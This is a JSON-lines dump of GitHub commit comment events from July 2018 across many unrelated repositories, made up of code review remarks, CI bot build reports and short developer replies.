{"id":"8003799431","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29800009,"position":null,"line":null,"path":null,"commit_id":"7eccb2f2b20dea5e042ac4c56a92b14589064145","created_at":"2018-07-23T13:10:13Z","updated_at":"2018-07-23T13:10:13Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-350](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-350).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-350-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-23T13:10:13Z"}
{"id":"8003803241","type":"CommitCommentEvent","actor":{"login":"Halle"},"repo":{"name":"travis-ci/vsphere-images"},"payload":{"comment":{"id":29800020,"position":null,"line":null,"path":null,"commit_id":"5393a5f45125a23ba4ba0b66fe662fc1ce9bdf6c","created_at":"2018-07-23T13:10:53Z","updated_at":"2018-07-23T13:10:53Z","author_association":"NONE","body":"👍🏻"}},"created_at":"2018-07-23T13:10:53Z"}
{"id":"8003803658","type":"CommitCommentEvent","actor":{"login":"Amtivha"},"repo":{"name":"Amtivha/gmall123456"},"payload":{"comment":{"id":29800021,"position":null,"line":null,"path":null,"commit_id":"f59c7a3b63d965282f1efb67e4f8614aad7ac0c6","created_at":"2018-07-23T13:10:58Z","updated_at":"2018-07-23T13:10:58Z","author_association":"OWNER","body":"阿道夫"}},"created_at":"2018-07-23T13:10:58Z"}
{"id":"8003803854","type":"CommitCommentEvent","actor":{"login":"kaweesi"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29800022,"position":12,"line":12,"path":"omod/src/main/java/org/openmrs/module/msfcore/ControllerService.java","commit_id":"5f25d1f5d29251a37202318cafeaca4e7f3e0eec","created_at":"2018-07-23T13:11:00Z","updated_at":"2018-07-23T13:11:00Z","author_association":"COLLABORATOR","body":"since i added a unit test for getAllConceptAnswers, i thought unit testing this method was not necessary since its just building off the same and looping through AllConceptAnswers and building a dropdownfield option list"}},"created_at":"2018-07-23T13:11:00Z"}
{"id":"8003804622","type":"CommitCommentEvent","actor":{"login":"Rohit1310"},"repo":{"name":"Rohit1310/Getting-and-Cleaning-Data-final-Project"},"payload":{"comment":{"id":29800025,"position":1,"line":1,"path":"CodeBook.md","commit_id":"275f0e7c1d6fffb279115ccb37c55b76a2027536","created_at":"2018-07-23T13:11:08Z","updated_at":"2018-07-23T13:11:08Z","author_association":"OWNER","body":"### Code book for Coursera Getting and Cleaning Data course project"}},"created_at":"2018-07-23T13:11:08Z"}
{"id":"8003805346","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29800027,"position":23,"line":22,"path":"Nianyi.js","commit_id":"815e0f47881af0add9aae7a6cf76ee9e59c21d14","created_at":"2018-07-23T13:11:16Z","updated_at":"2018-07-23T13:11:16Z","author_association":"OWNER","body":"The above two lines make the self-referencing real."}},"created_at":"2018-07-23T13:11:16Z"}
{"id":"8003805702","type":"CommitCommentEvent","actor":{"login":"TallFurryMan"},"repo":{"name":"sterne-jaeger/kstars"},"payload":{"comment":{"id":29800029,"position":88,"line":2289,"path":"kstars/ekos/capture/capture.cpp","commit_id":"c52640c15f9e621d75059e27d3ecd6785f66fbd3","created_at":"2018-07-23T13:11:20Z","updated_at":"2018-07-23T13:11:20Z","author_association":"NONE","body":"I think the real count is seqFileCount, not getTotalFramesCount.\r\nOK that makes the count possibly higher than the maximum, but that's just how it is."}},"created_at":"2018-07-23T13:11:20Z"}
{"id":"8003805910","type":"CommitCommentEvent","actor":{"login":"TallFurryMan"},"repo":{"name":"sterne-jaeger/kstars"},"payload":{"comment":{"id":29800030,"position":97,"line":2740,"path":"kstars/ekos/capture/capture.cpp","commit_id":"c52640c15f9e621d75059e27d3ecd6785f66fbd3","created_at":"2018-07-23T13:11:22Z","updated_at":"2018-07-23T13:11:22Z","author_association":"NONE","body":"So if I understand clearly, this function consolidates the number of captures of each sequence job item by adding the count value requested by the end-user, per storage location. In the case of of sequence RGBLRGB, this will return {map[R]=map[G]=map[B]=2, map[L]=1}. This might need a short comment to clarify.\r\nThis function is called once by \"start()\". Because there a way to \"pause\" the sequence capture, alter a count and restart the capture, it's possible to make the map outdated.\r\nIf think this function code should go to \"getTotalFramesCount()\", as this is probably an optimization made too early. Don't store the count in a map, recalculate it every time it is needed. Because the only call is at line 2284, I'd even say function refactoring is not needed! This won't be much slower, and will simplify the code."}},"created_at":"2018-07-23T13:11:22Z"}
{"id":"8003807728","type":"CommitCommentEvent","actor":{"login":"Alej0hio"},"repo":{"name":"RiiConnect24/RiiConnect24-Patcher"},"payload":{"comment":{"id":29800031,"position":null,"line":null,"path":null,"commit_id":"fdb7a917d9c3068d53c43e9b57daf09b1e6b3e06","created_at":"2018-07-23T13:11:42Z","updated_at":"2018-07-23T13:11:42Z","author_association":"NONE","body":"*NEW* CRITICAL BUG FIX FOR RIICONNECT24 PATCHER: BATTLE ROYALE! (GONE WRONG)"}},"created_at":"2018-07-23T13:11:42Z"}
{"id":"8003813338","type":"CommitCommentEvent","actor":{"login":"dscorbett"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29800038,"position":null,"line":null,"path":null,"commit_id":"62fa7cd1ccff4d4448ef84f9cc146464672636aa","created_at":"2018-07-23T13:12:43Z","updated_at":"2018-07-23T13:12:43Z","author_association":"CONTRIBUTOR","body":"That is unfortunate. It sounds like you have access to a Chakma corpus; how are <i>o</i> and <i>au</i> represented: in NFC, in NFD, decomposed but not in NFC, or a mix?"}},"created_at":"2018-07-23T13:12:43Z"}
{"id":"8003815016","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29800040,"position":30,"line":29,"path":"Nianyi.js","commit_id":"815e0f47881af0add9aae7a6cf76ee9e59c21d14","created_at":"2018-07-23T13:13:00Z","updated_at":"2018-07-23T13:13:00Z","author_association":"OWNER","body":"Fulfilling the previous calling in the constructor."}},"created_at":"2018-07-23T13:13:00Z"}
{"id":"8003815540","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29800042,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-23T13:13:05Z","updated_at":"2018-07-23T13:13:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T13:13:05Z"}
{"id":"8003816925","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29800043,"position":33,"line":32,"path":"Nianyi.js","commit_id":"815e0f47881af0add9aae7a6cf76ee9e59c21d14","created_at":"2018-07-23T13:13:20Z","updated_at":"2018-07-23T13:13:20Z","author_association":"OWNER","body":"The dual function of `setInnerProperty(name, value)`."}},"created_at":"2018-07-23T13:13:20Z"}
{"id":"8003819283","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29800048,"position":36,"line":35,"path":"Nianyi.js","commit_id":"815e0f47881af0add9aae7a6cf76ee9e59c21d14","created_at":"2018-07-23T13:13:46Z","updated_at":"2018-07-23T13:13:46Z","author_association":"OWNER","body":"Attaching the whole thing to the global variable."}},"created_at":"2018-07-23T13:13:46Z"}
{"id":"8003820498","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29800051,"position":13,"line":128,"path":"code/drasil-lang/Language/Drasil/Classes.hs","commit_id":"0081c9c57865eda8945186d35fc6e8e4408a2bc4","created_at":"2018-07-23T13:13:59Z","updated_at":"2018-07-23T13:13:59Z","author_association":"COLLABORATOR","body":"Change has been made in 99b1cbac4f4b017250f9d82a2a03c8e2b3882b1d."}},"created_at":"2018-07-23T13:13:59Z"}
{"id":"8003820869","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29800053,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-23T13:14:03Z","updated_at":"2018-07-23T13:14:03Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T13:14:03Z"}
{"id":"8003822186","type":"CommitCommentEvent","actor":{"login":"prusa3d-bb"},"repo":{"name":"prusa3d/Original-Prusa-i3"},"payload":{"comment":{"id":29800055,"position":null,"line":null,"path":null,"commit_id":"ad994c49ac9211c01122046ce410f98257c35ddf","created_at":"2018-07-23T13:14:17Z","updated_at":"2018-07-23T13:14:17Z","author_association":"NONE","body":"I am sorry, there should be STEP format available withing few days. Please stay tuned.\n\n\n—\nLukáš Vacek\nCustomer Support\n\n\nPRUSA Research\n+420 222 263 718\n+421 220 570 305\n188/7a Partyzánská, 17000, Prague\nshop.prusa3D.com\n\n\nFor simple troubleshooting, please use: http://help.prusa3d.com\n\n\nPlease rate our reply ...be generous :-)\n\n--- original message ---\nOn Fri, Jul 20, 2018 at 01:20 pm, <notifications@github.com> Michael Corcoran wrote:\n\n\n@prusa3d-bb\n\n> new parts are already uploaded on our site, feel free to check the STL files - https://www.prusa3d.com/prusa-i3-printable-parts/\n\n\nThat's not what he asked for. He wanted SCAD files as have been provided in the past (and continue to be required if you want to legitimately call this an open-source printer).\n\nRegarding the new 45 degree fan mount, I think it would be nice to add a hook/support for the part cooling fan cable at the front of the extruder body, as it goes a fair distance unsupported until it meets the PINDA cable in the clip at the rear.\n\n—\n\nYou are receiving this because you were mentioned.\n\nReply to this email directly, view it on GitHub, or mute the thread.\n--- end of original message ---"}},"created_at":"2018-07-23T13:14:17Z"}
{"id":"8003823272","type":"CommitCommentEvent","actor":{"login":"cuzfrog"},"repo":{"name":"tcurdt/jdependency"},"payload":{"comment":{"id":29800057,"position":34,"line":112,"path":"src/main/java/org/vafer/jdependency/Clazzpath.java","commit_id":"c7b84c49eb050b4e967bbde0185b41a1106afffa","created_at":"2018-07-23T13:14:27Z","updated_at":"2018-07-23T13:14:27Z","author_association":"CONTRIBUTOR","body":"@tcurdt `Files.newInputStream(path)`\r\n\r\n```\r\nCaused by: java.lang.UnsupportedOperationException\r\n        at com.sun.nio.zipfs.ZipPath.toFile(ZipPath.java:597)\r\n        at org.vafer.jdependency.Clazzpath.addClazzpathUnit(Clazzpath.java:112)\r\n```"}},"created_at":"2018-07-23T13:14:27Z"}
{"id":"8003823365","type":"CommitCommentEvent","actor":{"login":"dbaldan"},"repo":{"name":"DCurrent/openbor"},"payload":{"comment":{"id":29800058,"position":null,"line":null,"path":null,"commit_id":"e8b8d1cefdf9499c90b3a91354f8ea69bf9d083a","created_at":"2018-07-23T13:14:29Z","updated_at":"2018-07-23T13:14:29Z","author_association":"NONE","body":"@whitedragon0000 ah, that is great.\r\nFrom what I understood, it will be a third type of box, right? bbox, attackbox and ebox."}},"created_at":"2018-07-23T13:14:29Z"}
{"id":"8003824238","type":"CommitCommentEvent","actor":{"login":"TallFurryMan"},"repo":{"name":"sterne-jaeger/kstars"},"payload":{"comment":{"id":29800060,"position":40,"line":1306,"path":"kstars/ekos/capture/capture.cpp","commit_id":"c52640c15f9e621d75059e27d3ecd6785f66fbd3","created_at":"2018-07-23T13:14:37Z","updated_at":"2018-07-23T13:14:37Z","author_association":"NONE","body":"The initial value of seqTotalCount is -1, so I think initial operations should be done in that situation.\r\nAny reason you changed the test?"}},"created_at":"2018-07-23T13:14:37Z"}
{"id":"8003830564","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29800071,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-23T13:15:43Z","updated_at":"2018-07-23T13:15:43Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T13:15:43Z"}
{"id":"8003832394","type":"CommitCommentEvent","actor":{"login":"richiecroker"},"repo":{"name":"ebmdatalab/openprescribing"},"payload":{"comment":{"id":29800074,"position":null,"line":null,"path":null,"commit_id":"cde7d876173672bb47b2d6a5d9aa9379ddd7aa3a","created_at":"2018-07-23T13:16:02Z","updated_at":"2018-07-23T13:16:02Z","author_association":"CONTRIBUTOR","body":"thanks @evansd - one day i'll get it right!"}},"created_at":"2018-07-23T13:16:02Z"}
{"id":"8003833418","type":"CommitCommentEvent","actor":{"login":"gitmate-bot"},"repo":{"name":"coala/projects"},"payload":{"comment":{"id":29800077,"position":null,"line":null,"path":null,"commit_id":"28db5f10107fd139e68fc53cfb7be3f2508a49e6","created_at":"2018-07-23T13:16:13Z","updated_at":"2018-07-23T13:16:13Z","author_association":"NONE","body":"Comment on 28db5f10107fd139e68fc53cfb7be3f2508a49e6.\n\nThere are 11 results for the section global. They have been shortened and will not be shown inline because they are more than 10.\n\n| Message | File | Line |\n|---|---|---|\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Snake_case | _projects/use_coala_2.md | 127 |\n| Broken link - unable to connect to http://docs.gitmate.io/Developers/Newcomers_Guide/ | data/locale/en/projects/gitmate_plugins.md | 39 |\n| Broken link - unable to connect to https://choosealicense.com/ | data/locale/en/projects/add_repo_license.md | 133 |\n| Broken link - unable to connect to https://coala.io | reports/RJ722.md | 6 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/static-analysis | data/locale/en/projects/use_coala_3.md | 200 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/travis-ci | data/locale/en/projects/use_coala_3.md | 203 |\n| Broken link - unable to connect to https://docs.google.com/spreadsheets/d/1qMUsupzK30MaM79Jnq8N9ZitZgG2g7ae08Q-f8ExTDQ/edit | _projects/use_coala.md | 186 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/github | _projects/use_coala.md | 487 |\n| Broken link - unable to connect to https://www.npmjs.com/package/remark-lint-no-trailing-spaces | _projects/extend_linter_integration.md | 135 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/continuous-integration | data/locale/en/projects/use_coala_2.md | 272 |\n| Broken link - unable to connect to https://coala.io/chat | data/locale/en/faq/student_obligations.md | 6 |\n\nUntil GitMate provides an online UI to show a better overview, you can run [coala](https://coala.io/) locally for more details."}},"created_at":"2018-07-23T13:16:13Z"}
{"id":"8003834050","type":"CommitCommentEvent","actor":{"login":"Ulyana-Yeryksonava"},"repo":{"name":"OlgaDergachova/pvt-automation"},"payload":{"comment":{"id":29800079,"position":19,"line":19,"path":"Sentence.java","commit_id":"f3b4b2a7ddb0b59847d938fa603d97f7d20ff22a","created_at":"2018-07-23T13:16:20Z","updated_at":"2018-07-23T13:16:20Z","author_association":"NONE","body":"Can't the logic of this method and the same method in Paragraph be reused by moving to the another abstraction layer?"}},"created_at":"2018-07-23T13:16:20Z"}
{"id":"8003839786","type":"CommitCommentEvent","actor":{"login":"Ulyana-Yeryksonava"},"repo":{"name":"OlgaDergachova/pvt-automation"},"payload":{"comment":{"id":29800084,"position":9,"line":9,"path":"TextUtil.java","commit_id":"f3b4b2a7ddb0b59847d938fa603d97f7d20ff22a","created_at":"2018-07-23T13:17:21Z","updated_at":"2018-07-23T13:17:21Z","author_association":"NONE","body":"not clear method name"}},"created_at":"2018-07-23T13:17:21Z"}
{"id":"8003840667","type":"CommitCommentEvent","actor":{"login":"s256374p"},"repo":{"name":"s256374p/phi7182"},"payload":{"comment":{"id":29800085,"position":null,"line":null,"path":null,"commit_id":"a189717e69803bcec0b0ae8a76500a554c1ea0bb","created_at":"2018-07-23T13:17:30Z","updated_at":"2018-07-23T13:17:30Z","author_association":"OWNER","body":"This is the change in the code, for the memory , sometimes causes a crash "}},"created_at":"2018-07-23T13:17:30Z"}
{"id":"8003842693","type":"CommitCommentEvent","actor":{"login":"Ulyana-Yeryksonava"},"repo":{"name":"OlgaDergachova/pvt-automation"},"payload":{"comment":{"id":29800088,"position":18,"line":18,"path":"TextUtil.java","commit_id":"f3b4b2a7ddb0b59847d938fa603d97f7d20ff22a","created_at":"2018-07-23T13:17:50Z","updated_at":"2018-07-23T13:17:50Z","author_association":"NONE","body":"divide using which way?"}},"created_at":"2018-07-23T13:17:50Z"}
{"id":"8003843366","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/liblcm"},"payload":{"comment":{"id":29800090,"position":null,"line":null,"path":null,"commit_id":"dac617ec86cb16f8c5434a9c4b1d7664c44d9751","created_at":"2018-07-23T13:17:58Z","updated_at":"2018-07-23T13:17:58Z","author_association":"NONE","body":"TeamCity LCM :: liblcm-win32-master Continuous [Build 233](http://build.palaso.org/viewLog.html?buildId=125382&buildTypeId=Liblcm_LiblcmWin32masterContinuous) outcome was **FAILURE**\nSummary: Compilation error: src\\SIL.LCModel.Core\\SIL.LCModel.Core.csproj (new) Build time: 00:00:36"}},"created_at":"2018-07-23T13:17:58Z"}
{"id":"8003844743","type":"CommitCommentEvent","actor":{"login":"DCurrent"},"repo":{"name":"DCurrent/openbor"},"payload":{"comment":{"id":29800095,"position":null,"line":null,"path":null,"commit_id":"e8b8d1cefdf9499c90b3a91354f8ea69bf9d083a","created_at":"2018-07-23T13:18:12Z","updated_at":"2018-07-23T13:18:12Z","author_association":"OWNER","body":"Think Capcom - they use three boxes (actually four). Attack, Hit Detection (what we call body), and a space box (what WD just added). They're is also a fourth box for throw range, but we don't need that since there's already a system in place to control grabbing space."}},"created_at":"2018-07-23T13:18:12Z"}
{"id":"8003845791","type":"CommitCommentEvent","actor":{"login":"Ulyana-Yeryksonava"},"repo":{"name":"OlgaDergachova/pvt-automation"},"payload":{"comment":{"id":29800097,"position":42,"line":42,"path":"TextUtil.java","commit_id":"f3b4b2a7ddb0b59847d938fa603d97f7d20ff22a","created_at":"2018-07-23T13:18:23Z","updated_at":"2018-07-23T13:18:23Z","author_association":"NONE","body":"return new BufferedReader(new FileReader(fileName)).readLine()"}},"created_at":"2018-07-23T13:18:23Z"}
{"id":"8003849101","type":"CommitCommentEvent","actor":{"login":"Ulyana-Yeryksonava"},"repo":{"name":"OlgaDergachova/pvt-automation"},"payload":{"comment":{"id":29800105,"position":55,"line":55,"path":"TextUtil.java","commit_id":"f3b4b2a7ddb0b59847d938fa603d97f7d20ff22a","created_at":"2018-07-23T13:18:58Z","updated_at":"2018-07-23T13:18:58Z","author_association":"NONE","body":"the same as above"}},"created_at":"2018-07-23T13:18:58Z"}
{"id":"8003851234","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/liblcm"},"payload":{"comment":{"id":29800109,"position":null,"line":null,"path":null,"commit_id":"dac617ec86cb16f8c5434a9c4b1d7664c44d9751","created_at":"2018-07-23T13:19:20Z","updated_at":"2018-07-23T13:19:20Z","author_association":"NONE","body":"TeamCity LCM :: liblcm-win64-master Continuous [Build 197](http://build.palaso.org/viewLog.html?buildId=125381&buildTypeId=Liblcm_LiblcmWin64masterContinuous) outcome was **SUCCESS**\nSummary: Tests passed: 2608, ignored: 44 Build time: 00:02:06"}},"created_at":"2018-07-23T13:19:20Z"}
{"id":"8003851382","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/liblcm"},"payload":{"comment":{"id":29800110,"position":null,"line":null,"path":null,"commit_id":"dac617ec86cb16f8c5434a9c4b1d7664c44d9751","created_at":"2018-07-23T13:19:22Z","updated_at":"2018-07-23T13:19:22Z","author_association":"NONE","body":"TeamCity LCM :: liblcm-linux64-master Continuous [Build 199](http://build.palaso.org/viewLog.html?buildId=125380&buildTypeId=Liblcm_LiblcmLinux64masterContinuous) outcome was **SUCCESS**\nSummary: Tests passed: 2620, ignored: 32 Build time: 00:02:10"}},"created_at":"2018-07-23T13:19:22Z"}
{"id":"8003854377","type":"CommitCommentEvent","actor":{"login":"nelson909"},"repo":{"name":"johanC2x/Sysve_v2"},"payload":{"comment":{"id":29800115,"position":5,"line":87,"path":"application/controllers/sales.php","commit_id":"1102fa3341b7438304ec13467c195801e700952a","created_at":"2018-07-23T13:19:56Z","updated_at":"2018-07-23T13:19:56Z","author_association":"COLLABORATOR","body":"Identifica cotizacion_id"}},"created_at":"2018-07-23T13:19:56Z"}
{"id":"8003858121","type":"CommitCommentEvent","actor":{"login":"LoongKo"},"repo":{"name":"LoongKo/blog"},"payload":{"comment":{"id":29800120,"position":null,"line":null,"path":null,"commit_id":"1a0ac565f621f9168ad66207ae58831f6488268b","created_at":"2018-07-23T13:20:35Z","updated_at":"2018-07-23T13:20:35Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-23T13:20:35Z"}
{"id":"8003859031","type":"CommitCommentEvent","actor":{"login":"Wolfkid200444"},"repo":{"name":"ImpladeDeveloped/ImpladeBot"},"payload":{"comment":{"id":29800122,"position":null,"line":null,"path":null,"commit_id":"f875fcc64a16a947fa85b72841aea142263521a4","created_at":"2018-07-23T13:20:45Z","updated_at":"2018-07-23T13:20:45Z","author_association":"CONTRIBUTOR","body":"Thanks"}},"created_at":"2018-07-23T13:20:45Z"}
{"id":"8003860682","type":"CommitCommentEvent","actor":{"login":"dbaldan"},"repo":{"name":"DCurrent/openbor"},"payload":{"comment":{"id":29800126,"position":null,"line":null,"path":null,"commit_id":"e8b8d1cefdf9499c90b3a91354f8ea69bf9d083a","created_at":"2018-07-23T13:21:03Z","updated_at":"2018-07-23T13:21:03Z","author_association":"NONE","body":"@DCurrent cool, kinda like we have in Mugen too. This opens a new horizon for openbor.\r\nI think the last thing missing, from a Mugen point of view, is a friction system and an easier control of projectiles (like I commented to you some time ago)."}},"created_at":"2018-07-23T13:21:03Z"}
{"id":"8003862837","type":"CommitCommentEvent","actor":{"login":"ChickenStorm"},"repo":{"name":"Kalaxia/game-front"},"payload":{"comment":{"id":29800131,"position":32,"line":null,"path":"static/js/fleet.js","commit_id":"bf4a6157f9b16fe479821d709b6392264177edd3","created_at":"2018-07-23T13:21:27Z","updated_at":"2018-07-23T13:21:27Z","author_association":"NONE","body":"Pur le moment je ne sait pas comment Journey va être implémenté mais si le reste du code resemble à ce qui a déjà été fait Location va probablement être `nil` dans l'API. Et on veux surement garder les flottes qui  en mouvement qui partent ou qui arrive de cette planète. "}},"created_at":"2018-07-23T13:21:27Z"}
{"id":"8003863206","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29800133,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-23T13:21:31Z","updated_at":"2018-07-23T13:21:31Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T13:21:31Z"}
{"id":"8003872276","type":"CommitCommentEvent","actor":{"login":"rmrenmin"},"repo":{"name":"rmrenmin/Html5Code"},"payload":{"comment":{"id":29800151,"position":null,"line":null,"path":null,"commit_id":"3b1d52f5f7bf8a754f859d0025caf9d3839bf4ca","created_at":"2018-07-23T13:23:07Z","updated_at":"2018-07-23T13:23:07Z","author_association":"OWNER","body":"聚美优品首页头部js实现"}},"created_at":"2018-07-23T13:23:07Z"}
{"id":"8003873589","type":"CommitCommentEvent","actor":{"login":"tanosaur"},"repo":{"name":"tanosaur/hello"},"payload":{"comment":{"id":29800153,"position":null,"line":null,"path":null,"commit_id":"94e9561adf24fc15ebf9526d889f18426d6e3dcd","created_at":"2018-07-23T13:23:20Z","updated_at":"2018-07-23T13:23:20Z","author_association":"OWNER","body":"When I took out the height attribute, images then stretched vertically out of proportion. I added it back in, and on OS X Chrome and Safari, the issue resolved. Would you recommend still specifying the image resolution in the <img /> tag?"}},"created_at":"2018-07-23T13:23:20Z"}
{"id":"8003877881","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29800164,"position":null,"line":null,"path":null,"commit_id":"2453e9a926693f08dde20d8928520f202d2dc9b6","created_at":"2018-07-23T13:24:06Z","updated_at":"2018-07-23T13:24:06Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#ci-101](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#ci-101).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-101-next50.pantheonsite.io/)"}},"created_at":"2018-07-23T13:24:06Z"}
{"id":"8003878759","type":"CommitCommentEvent","actor":{"login":"nelson909"},"repo":{"name":"johanC2x/Sysve_v2"},"payload":{"comment":{"id":29800165,"position":null,"line":null,"path":null,"commit_id":"1102fa3341b7438304ec13467c195801e700952a","created_at":"2018-07-23T13:24:14Z","updated_at":"2018-07-23T13:24:14Z","author_association":"COLLABORATOR","body":"Actualizacion de modulo de Ventas"}},"created_at":"2018-07-23T13:24:14Z"}
{"id":"8003913885","type":"CommitCommentEvent","actor":{"login":"alex-ab"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":29800248,"position":null,"line":null,"path":null,"commit_id":"2f68fd76c2c2778f1c7eea477fd1de4a08dd532e","created_at":"2018-07-23T13:30:13Z","updated_at":"2018-07-23T13:30:13Z","author_association":"OWNER","body":"@cnuke: sorry, this one too"}},"created_at":"2018-07-23T13:30:13Z"}
{"id":"8003917246","type":"CommitCommentEvent","actor":{"login":"annacruz"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29800253,"position":1,"line":1,"path":"src/sha1hmac.h","commit_id":"dabd67afa7be03e04deb4f0885b818dad37dbfe8","created_at":"2018-07-23T13:30:45Z","updated_at":"2018-07-23T13:30:45Z","author_association":"CONTRIBUTOR","body":"Actually all the files included in this commit are already deleted."}},"created_at":"2018-07-23T13:30:45Z"}
{"id":"8003917278","type":"CommitCommentEvent","actor":{"login":"PhilippeBo"},"repo":{"name":"Nikvt/Articles-front-for-api"},"payload":{"comment":{"id":29800254,"position":12,"line":12,"path":"spec/interactors/mail_to_comment_receiver_spec.rb","commit_id":"45e97261505e26ddcb046ae16b566a1f6408855e","created_at":"2018-07-23T13:30:45Z","updated_at":"2018-07-23T13:30:45Z","author_association":"NONE","body":"FYI j'aurai écris ceci comme ceci : \r\n```\r\nlet(:comment) { {\r\n      \"attributes\": {\r\n            \"content\": \"sDFESFSE\",\r\n            \"user-name\": \"Nikolay Terekhov\",\r\n            \"user-email\": \"nikvt@mail.ru\"\r\n        }\r\n    }\r\n```"}},"created_at":"2018-07-23T13:30:45Z"}
